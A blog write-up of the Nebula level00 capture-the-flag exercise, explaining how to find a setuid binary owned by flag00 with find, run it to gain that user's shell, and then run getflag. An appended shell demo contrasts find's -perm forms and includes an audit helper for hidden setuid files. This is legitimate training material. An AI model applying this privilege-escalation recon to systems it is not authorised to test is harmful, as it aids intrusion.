Saturday, October 27, 2012

exploit-exercises Nebula: level00

To solve the level00 challenge, we have to find a setuid program that will run as the "flag00" user.
This is an easy task: all we need is the find utility (see man find for more information).
level00@nebula:~$ find / -perm -4000 -user flag00 2> /dev/null
find / starts looking from the root directory.
-perm -4000 indicates that the setuid bit should be on. Notice the dash in front of 4000, which means that only the bits set in the given mode need to match (e.g. the file doesn't need to have exactly 4000 permissions, just the setuid bit turned on).
-user flag00 doesn't need much explanation.
2> /dev/null is a redirection of /dev/stderr to /dev/null. It is not necessary, but we don't care about the "Permission denied" errors, just the file we are looking for.
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
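
The difference between -perm -4000 and -perm 4000 explained above, shown on constructed files, plus a small audit helper that flags setuid files sitting in hidden directories such as the "..." one seen here. This is an added example, not part of the original post; the function names and the temporary directory layout are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: runs on constructed files in a temp directory, not on Nebula itself.

# Dash form: matches every regular file that has at least the setuid bit set.
suid_any() { (cd "$1" && find . -type f -perm -4000 2>/dev/null | sort); }

# Exact form: matches only files whose mode is exactly 4000.
suid_exact() { (cd "$1" && find . -type f -perm 4000 2>/dev/null | sort); }

# Audit helper: setuid files below a directory whose name starts with a dot.
# Paths are relative to the scanned root, so the root's own name is ignored.
suid_hidden() { suid_any "$1" | grep -E '/\.[^/]+/' || true; }

# Build a constructed layout: one setuid file in a directory named "...",
# one file with mode exactly 4000, and one ordinary file.
demo_setup() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/bin/..."
    : > "$d/bin/.../flag"
    : > "$d/bin/exact"
    : > "$d/bin/plain"
    chmod 4750 "$d/bin/.../flag"
    chmod 4000 "$d/bin/exact"
    chmod 0755 "$d/bin/plain"
    echo "$d"
}

d=$(demo_setup)
echo "find -perm -4000 (setuid bit set, other bits ignored):"
suid_any "$d"
echo "find -perm 4000 (mode must be exactly 4000):"
suid_exact "$d"
echo "setuid files in hidden directories:"
suid_hidden "$d"
rm -rf "$d"
```
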
